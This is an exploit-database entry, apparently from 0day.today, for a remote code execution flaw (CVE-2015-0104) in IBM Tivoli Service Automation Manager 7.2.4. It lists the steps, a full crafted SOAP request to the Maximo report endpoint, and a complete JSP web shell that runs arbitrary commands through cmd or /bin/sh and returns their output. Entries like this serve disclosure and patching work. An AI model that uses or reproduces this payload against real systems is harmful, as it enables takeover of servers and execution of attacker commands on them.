Lucene search
Jakub Palaczynski1337DAY-ID-23269HistoryFeb 10, 2015 - 12:00 a.m.
IBM Tivoli Service Automation Manager 7.2.4 - Remote Code Execution Vulnerability
2015-02-1000:00:00
Jakub Palaczynski
0day.today
35
0.009 Low
EPSS
Percentile
83.2%
Exploit for jsp platform in category web applications
# Exploit Title: IBM Tivoli Service Automation Manager Remote Code Execution
# Date: 12\12\2014
# Exploit Author: Jakub Palaczynski
# Vendor Homepage: http://www.ibm.com/
# Version: All versions of IBM Tivoli Service Automation Manager up to 7.2.4
# VU/CVE: VU#782708, CVE-2015-0104
1. Create report
2. Browse to: https://site/maximo/report?__document=/system/path/web/root/shell.jsp&__report=<valid_report_name>&appname=<valid_appname>&__requestid=&reportNum=
3. Catch SOAP request generated by submitting form from previous step and inject JSP payload. Sample SOAP request:
POST /maximo/report?__document=/system/path/web/root/shell.jsp&__report=<valid_report_name>&appname=<valid_appname>&__requestid=&__sessionId=<valid_sessionid> HTTP/1.1
Host: site
Content-Length: xxx
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><GetUpdatedObjects xmlns="http://schemas.eclipse.org/birt"><Operation><Target><Id>Document</Id><Type>Document</Type></Target><Operator>GetPage</Operator><Oprand><Name>where</Name><Value>aaaaaaaaaaaaaaaaaaaaaa<![CDATA[<%@ page import="java.util.*,java.io.*"%>
<%
try {
String cmd;
String[] cmdarr;
String OS = System.getProperty("os.name");
if (request.getParameter("cmd") != null) {
cmd = new String (request.getParameter("cmd"));
if (OS.startsWith("Windows")) {
cmdarr = new String [] {"cmd", "/C", cmd};
}
else {
cmdarr = new String [] {"/bin/sh", "-c", cmd};
}
Process p = Runtime.getRuntime().exec(cmdarr);
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
} catch (Exception e) { e.printStackTrace();}
%>]]>aaaaaaaaaaaaaaaaaaaaaa</Value></Oprand><Oprand><Name>__isdisplay__where</Name><Value></Value></Oprand><Oprand><Name>appname</Name><Value>APPNAME</Value></Oprand><Oprand><Name>__isdisplay__appname</Name><Value>APPNAME</Value></Oprand><Oprand><Name>usepagebreaks</Name><Value>true</Value></Oprand><Oprand><Name>__isdisplay__usepagebreaks</Name><Value>true</Value></Oprand><Oprand><Name>__page</Name><Value>1</Value></Oprand><Oprand><Name>__svg</Name><Value>true</Value></Oprand><Oprand><Name>__page</Name><Value>1</Value></Oprand><Oprand><Name>__taskid</Name><Value></Value></Oprand></Operation></GetUpdatedObjects></soap:Body></soap:Envelope>
4. Web shell is now ready to use in path specified in __document parameter's value
# 0day.today [2018-03-19] #Related
prion
prion
Design/Logic Flaw
2017-04-24 06:59:00
Cross site scripting
2015-02-18 02:59:00
Cross site scripting
2015-02-18 02:59:00
cvelist
cvelist
cve
cve
nvd
nvd
exploitdb
exploitdb
IBM Tivoli Service Automation Manager 7.2.4 - Remote Code Execution
2014-12-12 00:00:00
